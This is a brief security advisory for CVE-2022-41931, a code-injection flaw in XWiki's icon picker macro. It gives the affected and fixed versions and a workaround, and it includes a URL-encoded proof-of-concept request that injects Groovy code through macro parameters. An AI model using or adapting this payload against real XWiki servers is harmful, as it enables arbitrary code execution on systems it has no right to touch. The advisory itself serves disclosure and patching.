CVE-2022-41931

Name of the Vulnerable Software and Affected Versions xwiki-platform-icon-ui versions prior to 13.10.7 xwiki-platform-icon-ui versions prior to 14.4.2 xwiki-platform-icon-ui versions prior to 14.5

Description The issue is related to improper neutralization of the macro parameters of the icon picker macro, allowing any user with view rights on commonly accessible documents to execute arbitrary Groovy, Python, or Velocity code in XWiki. This can be demonstrated using the URL "/xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter&language=en&sourceSyntax=xwiki%252F2.1&stripHTMLEnvelope=true&fromHTML=false&toHTML=true&text=%7B%7BiconPicker%20id%3D%22'%3C%2Fscript%3E%7B%7B%2Fhtml%7D%7D%7B%7Bcache%7D%7D%7B%7Bgroovy%7D%7Dprintln(%2FHellofromIconPickerId%2F)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D%22%20class%3D%22'%3C%2Fscript%3E%7B%7B%2Fhtml%7D%7D%7B%7Bcache%7D%7D%7B%7Bgroovy%7D%7Dprintln(%2FHellofromIconPickerClass%2F)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D%22%2F%7D%7D" where if the output "HellofromIconPickerId" or "HellofromIconPickerClass" is visible, the XWiki installation is vulnerable.

Recommendations For versions prior to 13.10.7, update to version 13.10.7 or later. For versions prior to 14.4.2, update to version 14.4.2 or later. For versions prior to 14.5, update to version 14.5 or later. As a temporary workaround, consider manually applying the patch by editing IconThemesCode.IconPickerMacro in the object editor or replacing the whole document with the current version by importing it from the XAR archive of a fixed version.